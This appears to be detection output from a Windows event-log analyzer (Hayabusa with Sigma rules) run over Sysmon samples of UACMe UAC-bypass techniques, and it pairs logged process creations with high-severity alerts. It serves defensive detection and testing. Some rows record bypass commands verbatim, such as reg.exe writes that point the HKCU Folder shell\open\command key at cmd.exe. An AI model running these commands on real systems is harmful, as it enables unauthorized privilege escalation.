+2019-08-03 21:31:27.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC040  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
+2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  36  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:35.085 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe""  /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu  :  Path: C:\Windows\System32\wusa.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:35.137 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 400 00000280644220C0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe""  /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu  :  Path: C:\Windows\System32\wusa.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using NTFS Reparse Point - Process,,rules/sigma/process_creation/win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:36.794 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dcomcnfg.exe""   :  Path: C:\Windows\System32\dcomcnfg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:36.812 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064471E00  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:37.160 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dcomcnfg.exe""   :  Path: C:\Windows\System32\dcomcnfg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:37.184 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\mmc.exe C:\Windows\system32\comexp.msc  :  Path: C:\Windows\System32\mmc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\dcomcnfg.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:37.261 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:49.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC3D0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  38  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
+2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
+2019-08-03 22:50:27.060 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 398 000002806443AF40  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
+2019-08-03 22:50:27.356 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc""  :  Path: C:\Windows\System32\mmc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  38",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
+2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe""   :  Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
+2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
+2019-08-03 22:50:29.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
+2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  39  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:08:06.419 +09:00,MSEDGEWIN10,11,high,UAC Bypass Using .NET Code Profiler on MMC,,rules/sigma/file_event/sysmon_uac_bypass_dotnet_profiler.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:08:06.730 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc  :  Path: C:\Windows\System32\mmc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  39",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:08:06.796 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 376 0000028064463A00  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:08:07.144 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc  :  Path: C:\Windows\System32\mmc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  39",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  41  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
+2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
+2019-08-04 00:16:31.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 342 00000280644BB040  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
+2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
+2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
+2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  43  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
+2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
+2019-08-04 16:26:34.302 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 342 0000028064468040  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
+2019-08-04 16:26:34.689 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 330 000002806444C490  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
+2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\DllHost.exe /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
+2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
+2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  45 c:\Windows\SysWOW64\notepad.exe  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 17:56:16.650 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 17:56:16.967 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 294 0000028064421EA0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\ChangePk.exe""   :  Path: C:\Windows\System32\changepk.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\slui.exe"" 0x03",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using ChangePK and SLUI,,rules/sigma/process_creation/win_uac_bypass_changepk_slui.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 17:56:20.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 444 00000280644250C0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 17:56:20.937 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\SystemSettingsAdminFlows.exe"" EnterProductKey  :  Path: C:\Windows\System32\SystemSettingsAdminFlows.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\ImmersiveControlPanel\SystemSettings.exe"" -ServerName:microsoft.windows.immersivecontrolpanel",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 17:56:22.193 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  53  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:28.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:28.925 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe"" /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:29.409 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe""   :  Path: C:\Windows\System32\sdclt.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  53",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:29.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 300 000002806445E5C0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe""   :  Path: C:\Windows\System32\sdclt.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  53",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,medium,High Integrity Sdclt Process,,rules/sigma/process_creation/sysmon_high_integrity_sdclt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\control.exe""  /name Microsoft.BackupAndRestoreCenter  :  Path: C:\Windows\System32\control.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\sdclt.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,medium,Sdclt Child Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:30.972 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\control.exe""  /name Microsoft.BackupAndRestoreCenter",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:35.402 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  55 c:\Windows\SysWOW64\notepad.exe  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:33:58.087 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\windows\system32\cmd.exe ""C:\Windows\system32\osk.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  55 c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\Windows\SysWOW64\notepad.exe  :  Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  55 c:\Windows\SysWOW64\notepad.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:33:58.713 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\msconfig.exe"" -5  :  Path: C:\Windows\System32\msconfig.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:33:58.774 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 322 000002806447A490  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:33:59.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\msconfig.exe"" -5  :  Path: C:\Windows\System32\msconfig.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  56  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:31.175 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
